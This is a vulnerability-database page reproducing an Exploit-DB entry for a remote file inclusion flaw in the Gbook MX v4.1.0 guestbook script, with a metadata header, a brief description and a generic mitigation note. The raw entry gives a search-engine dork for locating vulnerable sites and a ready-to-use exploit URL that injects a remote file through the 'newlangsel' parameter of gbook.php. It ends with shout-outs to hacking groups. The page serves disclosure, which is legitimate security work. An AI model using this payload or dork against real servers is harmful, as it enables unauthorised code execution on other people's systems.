header-logo
Suggest Exploit
vendor:
Gbook MX
by:
indoushka
7,5
CVSS
HIGH
RFI
98
CWE
Product Name: Gbook MX
Affected Version From: Gbook MX v4.1.0
Affected Version To: Gbook MX v4.1.0
Patch Exists: NO
Related CWE:
CPE: a:magtrb_soft:gbook_mx:4.1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux

Gbook MX v4.1.0 Arabic Version File inclusion Vulnerability

Gbook MX v4.1.0 is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request contains a URL pointing to a malicious file hosted on a remote server. If the vulnerable server is configured to allow remote file inclusion, the malicious file will be executed on the vulnerable server.

Mitigation:

To mitigate this vulnerability, the application should be configured to only allow the inclusion of files from trusted sources. Additionally, the application should be configured to only allow the inclusion of files with specific extensions.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Gbook MX v4.1.0 Arabic Version File inclusion Vulnerability                    
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                     
| # Total alerts found : 1                                                
|                High  : 1                                                                       
|              Medium  :                                                                        
|                  Low :                                                                            
|       Informational  :                                                             
| # Web Site : www.iq-ty.com                                                           
| # Dork     : Powered by Gbook MX v4.1.0 ©2003 Magtrb Soft                                   
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : RFI                                                                    
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- RFI

http://server/Gbook_mx4.1.0/gbookmx/gbook.php?newlangsel=http://127.0.0.1/c.txt?

================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com  
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)  
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com 
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com 
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com 
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
-------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR